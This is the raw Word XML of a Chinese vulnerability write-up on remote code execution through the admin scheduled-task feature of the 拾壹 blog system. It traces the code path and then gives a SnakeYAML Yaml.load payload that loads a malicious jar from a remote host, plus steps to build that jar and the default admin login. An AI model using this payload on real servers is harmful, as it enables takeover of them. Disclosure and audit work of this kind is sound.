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36B80">
      <w:pPr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拾壹博客系统管理后台定时任务远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF0CE4">
      <w:pPr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环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA52312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1.修改CaptchaUtil.java中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IMG_PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为本地图片路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F2CFE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2.将CaptchaUtil.java中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>getBufferedImage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数的if条件注释掉或将CaptchaUtil.java中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>place</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>变量修改为非0整数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A1E28">
      <w:pPr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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3728085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="62676795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7952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0D8A">
      <w:pPr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代码审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA02674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mojian-quartz模块负责处理定时任务，该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/monitor/job</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/run接口为执行一次任务，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC67FD9">
      <w:pPr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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3225165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1851861545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1545" name="图片 1" descr="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6D35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跟踪到SysJobServiceImpl.java中的runJob函数，该函数主要作用是获取job基础信息，如id和组信息，然后将其put进dataMap对象，最后使用triggerJob执行定时任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2C489">
      <w:pPr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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2262505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="3741475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759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3858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最终调用是在QuartzDisallowConcurrentExecution.java或QuartzJobExecution.java文件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>doExecute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数。两者区别为禁止并发执行和允许并发执行。最终都会走到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JobInvokeUtils.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>invokeMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDA9000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ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2898775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="64958222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2227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94F5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts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跟踪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>invokeMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，24-27行均在获取job基本信息，例如类名，方法名，方法参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA51B2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然后进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if (!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>isValidClassName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(beanName))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>判断，跟进该函数发现此函数是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过beanname判断是否为有效的classname。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3154680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="100474580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45802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F97B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts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因发现依赖有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>org.yaml.snakeyaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w: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所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用Yaml.load()函数远程加载jar包执行远程代码。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="26FDE488">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts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这里org.yaml.snakeyaml.Yaml为有效classname，取反后跳到else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA2C0EE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bean为Yaml对象，跟进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>invokeMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7AFFF4">
      <w:pPr>
        <w:jc w:val="left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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2661285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="182034384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43848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5107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ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>methodParams</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为1，进入if，经过反射调用，method为load函数，通过invoke成功调用Yaml.load()，执行远程代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28542BD7">
      <w:pPr>
        <w:jc w:val="left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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2575560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="93896978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69783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9B6C">
      <w:pPr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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="55316198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1985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0695">
      <w:pPr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漏洞验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFC769">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman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等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>恶意jar包build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB32B4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts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 xml:space="preserve">git clone </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/artsploit/yaml-payload" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://github.com/artsploit/yaml-payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70BEB0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#克隆下来记得改一下执行命令，改完后打包一下就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6537B2D1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vim yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D3E3C7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cd yaml-payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD619B0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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javac src/artsploit/AwesomeScriptEngineFactory.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36926EF7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts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jar -cvf yaml-payload.jar -C src/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36510860">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>然后将jar包放在可访问的web服务器上</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A08A326">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线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Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>添加定时任务并执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16226FEF">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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admin/123456进入管理后台，如图，添加定时任务，调用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF1337">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://</w:t>
      </w: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ip:port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w: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exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.jar"]]]]')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA46821">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线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0175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41E7">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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添加完成后点击执行一次，就会看到已经远程加载了恶意jar包，查看web日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E12C438">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="748665"/>
            <wp:effectExtent l="0" t="0" r="146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4438">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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然后会执行AwesomeScriptEngineFactory.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件中的代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF56FA9">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线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3387725"/>
            <wp:effectExtent l="0" t="0" r="317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DF4BB3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C8DF4BB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FmMzY2ZDA5YWFiMjkyZGM2NWFlNWY4YTdjYTUzMjUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="004F32DC"/>
    <w:rsid w:val="00052EFF"/>
    <w:rsid w:val="00080555"/>
    <w:rsid w:val="00093C50"/>
    <w:rsid w:val="000D5789"/>
    <w:rsid w:val="001B56AB"/>
    <w:rsid w:val="00232D7D"/>
    <w:rsid w:val="002A6F06"/>
    <w:rsid w:val="002A7BF8"/>
    <w:rsid w:val="0033777F"/>
    <w:rsid w:val="00463234"/>
    <w:rsid w:val="004C1D3A"/>
    <w:rsid w:val="004F32DC"/>
    <w:rsid w:val="00645C11"/>
    <w:rsid w:val="007D36D3"/>
    <w:rsid w:val="00820895"/>
    <w:rsid w:val="009278F2"/>
    <w:rsid w:val="00A75AAD"/>
    <w:rsid w:val="00BD4CDF"/>
    <w:rsid w:val="00C81E66"/>
    <w:rsid w:val="00C95310"/>
    <w:rsid w:val="00CA390A"/>
    <w:rsid w:val="00CE4DBA"/>
    <w:rsid w:val="00CF0D92"/>
    <w:rsid w:val="00D2667C"/>
    <w:rsid w:val="00D6763F"/>
    <w:rsid w:val="00DA6C71"/>
    <w:rsid w:val="00DC0409"/>
    <w:rsid w:val="00EC7A5E"/>
    <w:rsid w:val="00F80E3E"/>
    <w:rsid w:val="00FF5139"/>
    <w:rsid w:val="7B23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403</Words>
  <Characters>1000</Characters>
  <Lines>7</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>10</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1011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2025-09-01T03:27:00Z</dcterms:created>
  <dc:creator>xiao c</dc:creator>
  <cp:lastModifiedBy>Rainbow</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-03T07:34:17Z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DC2D242CA6844BD18BB901C55445EB6F_12</vt:lpwstr>
  </property>
</Properties>
</file>